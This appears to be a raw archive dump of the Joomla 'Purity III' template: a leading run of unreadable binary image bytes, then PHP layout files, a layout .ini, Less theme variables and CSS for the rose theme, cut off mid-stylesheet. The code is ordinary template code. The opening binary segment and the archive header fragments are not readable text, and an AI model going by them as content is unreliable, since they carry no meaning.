�ޝՅ��$�E7�wO.A�t�4j����n����8̇ÇX4U\���5r3�.�@/�1R�$��xe��F�謁-j�db����wMS0SMX�Um�v�W�R��^"��B�P�s���U�:�"���
5tdL��)�v�s:^�a�
fG����`�xN�B0�A�h���9J����	�u3��D%ɔp�{F/�ǁ�e�B-
�m�~A�R,�C�Ν���y�8�F�3+N�ޞ�Ml昵�q�Hq$6�l�䬢[H5�Yq�Ǫ�yR���ن�0Y�ٔPq:q����N��!\Z��XO�u��^W�8V-ER��	��߈.R,�R'+�ŀ�
�Z�l��ݻ'��0�J�\�z�\ �x��+W��R���V��:4��M�(I��hu�!������\=����о�wi�k��=�υ���ڊ��.�D*`gI�z���\��u~�6Ho ݙ;�ՇB-L�4D��HqR�F+�XI*2�\Edz�ٽ};��K!F�řD>궽"�w�מ�Ο?�w���p+����D#�
���>�/��o��1�]/�}� �!�F�6����T�Xٴ��j�)�s5��������P4��H���~���?���Q;Jz�dG�
'�_���W�䤇�F��+.h��ED��H�ٗ���ҐZ���"Z�F��!����S�Vhڸ�s	�%�2moE�iO_}��;���XV�V
8���g%�%,���e�r',��I�0�}ߞڨk*�@R[�X�*^���K	���/w��2��z8�E{�%Qaۛ��,K��{���ؓ��u���q�$��:�e�Լ���ۦ(�U�W��	��:��_��<�U�,<k���u�<+=��R�ҫ��\Ʊ֨� ����G�ǽv��o��X�֜��uun��h����8
#���/����p��6��a*�?�})L~-$�y5s9�<hx��Y��	�/�:E�Ɛ;�O����5b��p��D:�����sL�O�D�&`_�;|Ձ���f6
�G��'"��V�
��F�`�G3��ϡ�x�߃� �Rc�^��"��*f秪Ca<O�
ċ_�2hj��5Q������˱�xS��se+ګ��R��E�	xf��O!1~Ih$��DL�o<o��NEu�2��\��2��{�<���$V`�:���{�7��g�R��ױ�t
�LF�7�,�������ju
 ��a����J5b����v��B�����(�|>���6�:u
q��@q�y�������Yy�	\.
ܒ�n�G�p!L�M�w��	�}��t�S
R�,��~�%�l��_�
��py�2��r���+4����y�CN<[^iD:m֖�%˲&�(VD��hoG��.�ЅB�U�O.�]�yO?�4>��ϊ�ߋ�Ž���J�\��O2����g���?1�l�F��ĥ�b@��u��W��7����8��X4*;���˯�9��Y�[WQu���|�}1M�� ���Ҕ��-^�~5�%�,�VR��c rS+�>���??q?
&��QT�
$����'q$IZ�$�q$IZ����!:�vIEND�B`�PKԜ�\/}f
��purity_iii/index.phpnu&1i�<?php
/**
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org
 *------------------------------------------------------------------------------
 */

// no direct access
defined('_JEXEC') or die;

//check if t3 plugin is existed
if (!defined('T3')) {
    if (JError::$legacy) {
        JError::setErrorHandling(E_ERROR, 'die');
        JError::raiseError(500, JText::_('T3_MISSING_T3_PLUGIN'));
        exit;
    } else {
        throw new Exception(JText::_('T3_MISSING_T3_PLUGIN'), 500);
    }
}

$t3app = T3::getApp($this);

// get configured layout
$layout = $t3app->getLayout();


$t3app->loadLayout($layout);PKԜ�\	C�=88;purity_iii/local/html/com_content/featured/default_item.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_content
 *
 * @copyright   Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Create a shortcut for params.
$params  = & $this->item->params;
$images  = json_decode($this->item->images);
$canEdit = $this->item->params->get('access-edit');
$info    = $params->get('info_block_position', 2);
$icons = ($params->get('show_print_icon') ||
	$params->get('show_email_icon') ||
	$canEdit);
$aInfo1 = ($params->get('show_publish_date') || $params->get('show_category') || $params->get('show_parent_category') || $params->get('show_author'));
$aInfo2 = ($params->get('show_create_date') || $params->get('show_modify_date') || $params->get('show_hits'));
$topInfo = ($aInfo1 && $info != 1) || ($aInfo2 && $info == 0);
$botInfo = ($aInfo1 && $info == 1) || ($aInfo2 && $info != 0);
$icons = $params->get('access-edit') || $params->get('show_print_icon') || $params->get('show_email_icon');
?>

<?php if ($this->item->state == 0 || strtotime($this->item->publish_up) > strtotime(JFactory::getDate()) || ((strtotime($this->item->publish_down) < strtotime(JFactory::getDate())) && $this->item->publish_down != '0000-00-00 00:00:00' )) : ?>
<div class="system-unpublished">
<?php endif; ?>

	<!-- Article -->
	<article>

		<?php if ($params->get('show_title')) : ?>
			<?php echo JLayoutHelper::render('joomla.content.item_title', array('item' => $this->item, 'params' => $params, 'title-tag'=>'h2')); ?>
		<?php endif; ?>

		    <!-- Aside -->
		    <?php if ($topInfo || $icons) : ?>
		    <aside class="article-aside clearfix">
		      <?php if ($topInfo): ?>
		      <?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'above')); ?>
		      <?php endif; ?>
		      
		      <?php if ($icons): ?>
		      <?php echo JLayoutHelper::render('joomla.content.icons', array('item' => $this->item, 'params' => $params)); ?>
		      <?php endif; ?>
		    </aside>  
		    <?php endif; ?>
		    <!-- //Aside -->

				<?php echo JLayoutHelper::render('joomla.content.intro_image', $this->item); ?>

				<?php if (!$params->get('show_intro')) : ?>
					<?php echo $this->item->event->afterDisplayTitle; ?>
				<?php endif; ?>

				<?php echo $this->item->event->beforeDisplayContent; ?>

				<section class="article-intro clearfix">
					<?php echo $this->item->introtext; ?>
				</section>
    
		    <!-- footer -->
		    <?php if ($botInfo) : ?>
		    <footer class="article-footer clearfix">
		      <?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'below')); ?>
		    </footer>
		    <?php endif; ?>
		    <!-- //footer -->

			    <?php if ($params->get('show_tags', 1) && !empty($this->item->tags)) : ?>
			      <?php echo JLayoutHelper::render('joomla.content.tags', $this->item->tags->itemTags); ?>
			    <?php endif; ?>

				<?php if ($params->get('show_readmore') && $this->item->readmore) :
					if ($params->get('access-view')) :
						$link = JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid));
					else :
						$menu      = JFactory::getApplication()->getMenu();
						$active    = $menu->getActive();
						$itemId    = $active->id;
						$link1     = JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId);
						$returnURL = JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid));
						$link      = new JURI($link1);
						$link->setVar('return', base64_encode($returnURL));
					endif;
					?>
					<section class="readmore">
						<a class="btn btn-default" href="<?php echo $link; ?>">
							<span>
							<?php if (!$params->get('access-view')) :
								echo JText::_('COM_CONTENT_REGISTER_TO_READ_MORE');
							elseif ($readmore = $this->item->alternative_readmore) :
								echo $readmore;
								if ($params->get('show_readmore_title', 0) != 0) :
									echo JHtml::_('string.truncate', ($this->item->title), $params->get('readmore_limit'));
								endif;
							elseif ($params->get('show_readmore_title', 0) == 0) :
								echo JText::sprintf('COM_CONTENT_READ_MORE_TITLE');
							else :
								echo JText::_('COM_CONTENT_READ_MORE');
								echo JHtml::_('string.truncate', ($this->item->title), $params->get('readmore_limit'));
							endif; ?>
							</span>
						</a>
					</section>
				<?php endif; ?>
	</article>
	<!-- //Article -->

 <?php if ($this->item->state == 0 || strtotime($this->item->publish_up) > strtotime(JFactory::getDate()) || ((strtotime($this->item->publish_down) < strtotime(JFactory::getDate())) && $this->item->publish_down != '0000-00-00 00:00:00' )) : ?>
</div>
<?php endif; ?>
<?php echo $this->item->event->afterDisplayContent; ?>PKԜ�\�Tvv)purity_iii/local/etc/layout/corporate.ininu&1i�[off-canvas]
position="off-canvas"

[head-search]
position="head-search"

[slideshow]
position="slideshow"

[sidebar-1]
position="sidebar-1"

[sidebar-2]
position="sidebar-2"

[footer]
position="footer"

[block1@spotlight-1]
lg="col-lg-4"
md="col-md-4"
sm="col-sm-4"
xs="col-xs-6"
position="position-1"

[block2@spotlight-1]
lg="col-lg-4"
md="col-md-4"
sm="col-sm-4"
xs="col-xs-6"
position="position-2"

[block3@spotlight-1]
lg="col-lg-4"
md="col-md-4"
sm="col-sm-4"
xs="col-xs-12"
position="position-3"

[block1@spotlight-2]
lg="col-lg-12"
md="col-md-12"
sm="col-sm-12"
xs="col-xs-12"
position="position-5"

[block1@spotlight-3]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-12"
position="position-9"

[block2@spotlight-3]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-12"
position="position-10"

[block3@spotlight-3]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-12"
position="position-11"

[block4@spotlight-3]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-12"
position="position-12"

[block1@footer-sl]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="footer-1"

[block2@footer-sl]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="footer-2"

[block3@footer-sl]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="footer-3"

[block4@footer-sl]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="footer-4"PKԜ�\�.��6purity_iii/local/less/themes/red/variables-custom.lessnu&1i�
@font-size-base: 14px;
@brand-primary: @red;
@body-bg: #fff;
@text-color: @gray-dark;
@headings-color: inherit;
@link-color: @brand-primary;
@border-radius-base: 0px;
@border-radius-large: 0px;
@border-radius-small: 0px;
@t3-module-bg: transparent;
@t3-module-color: inherit;
@t3-module-title-bg: @t3-module-bg;
@t3-module-title-color: @t3-module-color;
@t3-footer-background: @gray-lightest;
@t3-footer-text-color: @gray;
@t3-footer-module-background: @t3-footer-background;
@t3-footer-module-text-color: @t3-footer-text-color;
@t3-footer-module-title-color: @text-color;
@container-lg: 1170px;
@container-md: 970px;
@container-sm: 750px;
@grid-gutter-width: 30px;PKԜ�\��-��7purity_iii/local/less/themes/gris/variables-custom.lessnu&1i�
@font-size-base: 14px;
@brand-primary: #454444;
@body-bg: #fff;
@text-color: @gray-dark;
@headings-color: inherit;
@link-color: @brand-primary;
@border-radius-base: 0px;
@border-radius-large: 0px;
@border-radius-small: 0px;
@t3-module-bg: transparent;
@t3-module-color: inherit;
@t3-module-title-bg: @t3-module-bg;
@t3-module-title-color: @t3-module-color;
@t3-footer-background: @gray-lightest;
@t3-footer-text-color: @gray;
@t3-footer-module-background: @t3-footer-background;
@t3-footer-module-text-color: @t3-footer-text-color;
@t3-footer-module-title-color: @text-color;
@container-lg: 1170px;
@container-md: 970px;
@container-sm: 750px;
@grid-gutter-width: 30px;PKԜ�\�vSA��/purity_iii/local/less/themes/rose/template.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */
PKԜ�\��d���0purity_iii/local/less/themes/rose/variables.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */


// Brand colors
// -------------------------
@brand-primary:                 @orange;


// Scaffolding
// -------------------------
@body-bg:                 @white;
@text-color:              @gray-dark;


// Links
// -------------------------
@link-color:              @brand-primary;PKԜ�\ӋhH��7purity_iii/local/less/themes/rose/variables-custom.lessnu&1i�
@font-size-base: 14px;
@brand-primary: #db00af;
@body-bg: #ffffff;
@text-color: @gray-dark;
@headings-color: inherit;
@link-color: @brand-primary;
@border-radius-base: 0px;
@border-radius-large: 0px;
@border-radius-small: 0px;
@t3-module-bg: transparent;
@t3-module-color: inherit;
@t3-module-title-bg: @t3-module-bg;
@t3-module-title-color: @t3-module-color;
@t3-footer-background: @gray-lightest;
@t3-footer-text-color: @gray;
@t3-footer-module-background: @t3-footer-background;
@t3-footer-module-text-color: @t3-footer-text-color;
@t3-footer-module-title-color: @text-color;
@container-lg: 1170px;
@container-md: 970px;
@container-sm: 750px;
@grid-gutter-width: 30px;PKԜ�\MP,��7purity_iii/local/less/themes/vert/variables-custom.lessnu&1i�
@font-size-base: 14px;
@brand-primary: #10bf00;
@body-bg: #fff;
@text-color: @gray-dark;
@headings-color: inherit;
@link-color: @brand-primary;
@border-radius-base: 0px;
@border-radius-large: 0px;
@border-radius-small: 0px;
@t3-module-bg: transparent;
@t3-module-color: inherit;
@t3-module-title-bg: @t3-module-bg;
@t3-module-title-color: @t3-module-color;
@t3-footer-background: @gray-lightest;
@t3-footer-text-color: @gray;
@t3-footer-module-background: @t3-footer-background;
@t3-footer-module-text-color: @t3-footer-text-color;
@t3-footer-module-title-color: @text-color;
@container-lg: 1170px;
@container-md: 970px;
@container-sm: 750px;
@grid-gutter-width: 30px;PKԜ�\���1purity_iii/local/css/themes/rose/layouts/docs.cssnu&1i�.docs-section {
  margin-bottom: 40px;
}
.docs-section .page-header {
  margin-bottom: 20px;
}
.docs-section .page-header h1 {
  font-size: 42px;
}
.example-type h1,
.example-type h2,
.example-type h3,
.example-type h4,
.example-type h5,
.example-type h6 {
  margin: 20px 0;
}
.example-colors .swatch-item {
  width: 100%;
  min-height: 100px;
  position: relative;
  background: #444444;
  color: #fff;
  margin-bottom: 20px;
}
.example-colors .swatch-item dl {
  width: 100%;
  position: absolute;
  bottom: 0;
  padding: 20px;
  margin: 0;
}
.example-colors .color-brand-primary {
  background: #db00af;
}
.example-colors .color-brand-secondary {
  background: #3e9b52;
}
.example-colors .color-brand-success {
  background: #3e9b52;
}
.example-colors .color-brand-danger {
  background: #cc0000;
}
.example-colors .color-brand-warning {
  background: #ff8800;
}
.example-colors .color-brand-info {
  background: #0099cc;
}
.example-colors .color-gray-darker {
  background: #222222;
}
.example-colors .color-gray-dark {
  background: #444444;
}
.example-colors .color-gray {
  background: #666666;
}
.example-colors .color-gray-light {
  background: #999999;
  color: #444444;
}
.example-colors .color-gray-lighter {
  background: #eeeeee;
  color: #444444;
}
.example-colors .color-gray-lightest {
  background: #f7f7f7;
  color: #444444;
}
.example-buttons .btn,
.example-inputs .btn,
.example-buttons .form-control,
.example-inputs .form-control {
  width: 100%;
  margin-bottom: 20px;
}PKԜ�\��O��5purity_iii/local/css/themes/rose/layouts/magazine.cssnu&1i�.magazine-item:before,
.magazine-featured-leading:before,
.magazine-featured-intro:before,
.magazine-category:before,
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  content: " ";
  display: table;
}
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  clear: both;
}
.magazine .page-subheader h2 {
  font-size: 42px;
}
.magazine-category-title {
  margin-bottom: 20px;
  font-size: 18px;
  background: #eeeeee;
  padding: 10px;
}
.magazine-category-title strong {
  font-weight: 600;
}
.magazine-category-title .fa {
  font-size: 14px;
  position: relative;
  top: -1px;
  left: 2px;
}
.magazine-category-title > a {
  display: inline-block;
  color: #444444;
  text-transform: uppercase;
}
.magazine-category-title > a:hover,
.magazine-category-title > a:active,
.magazine-category-title > a:focus {
  text-decoration: none;
  color: #db00af;
}
.magazine-item .page-header {
  padding-bottom: 0;
  margin-bottom: 5px;
  border-bottom: 0;
}
.magazine-item .page-header h2 {
  margin: 0;
  font-size: 16px;
  line-height: 1.275;
  font-weight: 700;
}
.magazine-item .page-header h2 a:hover,
.magazine-item .page-header h2 a:active,
.magazine-item .page-header h2 a:focus {
  text-decoration: none;
}
.magazine-item .item-image {
  overflow: hidden;
}
.magazine-item .item-image,
.magazine-item .pull-left.item-image,
.magazine-item .pull-right.item-image {
  width: 100%;
  max-width: 100%;
  float: none !important;
  margin-bottom: 20px;
}
.magazine-item .item-image img,
.magazine-item .pull-left.item-image img,
.magazine-item .pull-right.item-image img,
.magazine-item .img_caption {
  width: 100% !important;
  max-width: 100%;
}
.magazine-item .article-aside {
  margin-top: 10px;
  margin-bottom: 10px;
}
.magazine-item .article-info {
  color: #999999;
  margin: 0;
  width: 100%;
}
.magazine-item .article-info dd {
  white-space: inherit;
}
.magazine-item-ct p:last-child {
  margin-bottom: 0;
}
.magazine-leading {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item .page-header h2 {
  font-size: 35px;
}
@media screen and (min-width: 768px) {
  .magazine-leading .magazine-item .item-image {
    max-height: 300px;
  }
}
.magazine-leading .magazine-item .magazine-item-ct {
  font-size: 16px;
}
.magazine-intro {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item .item-image {
  max-height: 120px;
}
.magazine-intro .magazine-item .item-image p.img_caption {
  display: none;
}
.magazine-links {
  margin-top: 40px;
}
.magazine-links::before {
  display: inline-block;
  content: "MORE NEWS";
  background: #444444;
  font-weight: normal;
  padding: 5px 10px;
  margin-bottom: 10px;
  color: #fff;
}
.magazine-links .link-item {
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0 9px;
}
.magazine-links .page-header {
  margin: 0;
}
.magazine-links .page-header h2 {
  font-size: 16px;
}
.magazine-links .article-aside {
  margin-top: 5px;
  margin-bottom: 0;
}
.magazine-featured-links {
  margin-top: 0;
  margin-bottom: 40px;
}
.magazine-category {
  margin-bottom: 40px;
}
.magazine-category .row-articles {
  margin-bottom: 20px;
}
.magazine-category .row-articles:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .magazine-category .row-articles .magazine-item-media {
    padding-right: 0;
  }
}
.magazine-category .magazine-leading {
  margin-bottom: 40px;
}
.magazine-category .magazine-item .category-name {
  display: none;
}
.magazine-category .magazine-item-ct {
  color: #666666;
  font-size: 12px;
}PKԜ�\C���((1purity_iii/local/css/themes/rose/layouts/blog.cssnu&1i�.blog .blog-item {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
  padding-bottom: 40px;
}
.blog .blog-item .item-image {
  margin-top: 7px;
  margin-right: 0;
}
.blog .blog-item .item-image.pull-left {
  max-width: 100%;
}
.blog .blog-item .item-image img {
  max-width: 100%;
  width: 100%;
}
.blog .blog-item .page-header {
  border: 0;
  margin: 0 0 10px;
  padding: 0;
}
.blog .blog-item .page-header h2 {
  margin: 0;
  line-height: 1.3;
}
.blog .blog-item .page-header h2 a:hover,
.blog .blog-item .page-header h2 a:focus,
.blog .blog-item .page-header h2 a:active {
  color: #8f0072;
}
.blog .blog-item .article-intro {
  margin-bottom: 20px;
}
.blog .item-page .tags {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.blog .item-page .tags span a {
  background: #eeeeee;
}PKԜ�\S��3!!5purity_iii/local/css/themes/rose/layouts/porfolio.cssnu&1i�.porfolio .page-header {
  text-align: center;
  border-bottom: 0;
  margin-top: 10px;
  margin-bottom: 0;
  padding: 0;
}
.porfolio-items {
  margin-top: 20px;
  padding-top: 20px;
  border-top: 1px solid #eeeeee;
  text-align: center;
}
.porfolio-items .thumbnail {
  border: 0;
  padding: 0;
  margin: 20px 0;
}
.porfolio-items .thumbnail > a {
  color: #444444;
  text-decoration: none;
}
.porfolio-items .thumbnail > a:hover,
.porfolio-items .thumbnail > a:active,
.porfolio-items .thumbnail > a:focus {
  color: #db00af;
  text-decoration: none;
}
.porfolio-items .item-image {
  float: none !important;
  border: 1px solid #eeeeee;
  padding: 3px;
  position: relative;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.porfolio-items .item-image img {
  width: 100%;
  padding: 0;
}
.porfolio-items .thumbnail > a:hover .item-image,
.porfolio-items .thumbnail > a:active .item-image,
.porfolio-items .thumbnail > a:focus .item-image {
  border-color: #bbbbbb;
}
.porfolio-items .thumbnail > a:hover .item-image img,
.porfolio-items .thumbnail > a:active .item-image img,
.porfolio-items .thumbnail > a:focus .item-image img {
  opacity: .7;
}
.porfolio-items h3 {
  margin-top: 20px;
  margin-bottom: 5px;
  font-weight: 700;
  font-size: 18px;
}
.porfolio-items p {
  color: #666666;
  margin: 0;
}
.porfolio .item-state {
  width: 70px;
  height: 70px;
  background: url(../../../../../images/porfolio-item-states.png) no-repeat center top;
  display: block;
  text-indent: -9999em;
  position: absolute;
  top: -3px;
  right: -3px;
}
.porfolio .state-free {
  background-position: center;
}
.porfolio .state-hot {
  background-position: center bottom;
}
.porfolio .item-demo-url {
  display: inline-block;
  margin-top: 20px;
}PKԜ�\;purity_iii/local/css/themes/rose/layouts/features-intro.cssnu&1i�PKԜ�\�.��6purity_iii/local/css/themes/rose/layouts/corporate.cssnu&1i�.corporate .slideshow {
  background: #f7f7f7;
  border-bottom: 1px solid #eeeeee;
  padding: 40px 0;
}
.corporate .t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.corporate .t3-sl-1 .t3-module,
.corporate .t3-sl-2 .t3-module,
.corporate .t3-sl-3 .t3-module {
  margin-bottom: 0;
}
.corporate .t3-sl-2 {
  padding: 0;
}
.corporate .carousel-caption {
  background: rgba(0, 0, 0, 0.3);
}
.corporate .t3-module .media {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 10px;
}
.corporate .t3-module .media:last-child {
  border: 0;
  padding: 0;
}
.corporate .items-leading {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
}
.corporate .items-row {
  border-bottom: 1px solid #eeeeee;
}
.corporate .items-row:last-child {
  border: 0;
}PKԜ�\�qecOcO/purity_iii/local/css/themes/rose/off-canvas.cssnu&1i�.off-canvas-toggle {
  z-index: 100;
}
html,
body {
  height: 100%;
}
.noscroll {
  position: fixed;
  overflow-y: scroll;
  width: 100%;
}
.t3-wrapper {
  background: #ffffff;
  position: relative;
  left: 0;
  z-index: 99;
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  overflow: visible;
}
.t3-wrapper::after {
  position: absolute;
  top: 0;
  right: 0;
  width: 0;
  height: 0;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  z-index: 100;
}
.t3-mainnav-android {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .t3-wrapper::after {
  width: 100%;
  height: 10000px;
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-open .t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.t3-off-canvas {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 100;
  visibility: hidden;
  width: 250px;
  height: 100%;
  overflow: hidden;
  -webkit-transition: all 0.5s;
  transition: all 0.5s;
}
.t3-off-canvas::after {
  position: absolute;
  top: 0;
  right: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-right.t3-off-canvas {
  display: none;
}
.off-canvas-right .off-canvas-right.t3-off-canvas {
  display: block;
}
html[dir="ltr"] .off-canvas-right.t3-off-canvas {
  left: auto;
  right: 0;
}
.off-canvas-open .t3-off-canvas::after {
  width: 0;
  height: 0;
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .off-canvas-current {
  visibility: visible;
}
.off-canvas-open .t3-off-canvas {
  overflow-y: auto;
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #db00af;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #8f0072;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .dropdown-menu {
  position: static;
  float: none;
  display: block;
  width: 100%;
  padding: 0;
  border: 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-1.off-canvas-open .off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-1.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-2.t3-off-canvas {
  z-index: 1;
}
.off-canvas-effect-2.off-canvas-open .off-canvas-effect-2.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-2.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .off-canvas-effect-3.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-3.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .off-canvas-effect-4.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-4.t3-off-canvas {
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .off-canvas-effect-5.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
body.off-canvas-effect-6 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
  height: auto;
  overflow: hidden;
}
.off-canvas-effect-6.off-canvas-open .t3-wrapper {
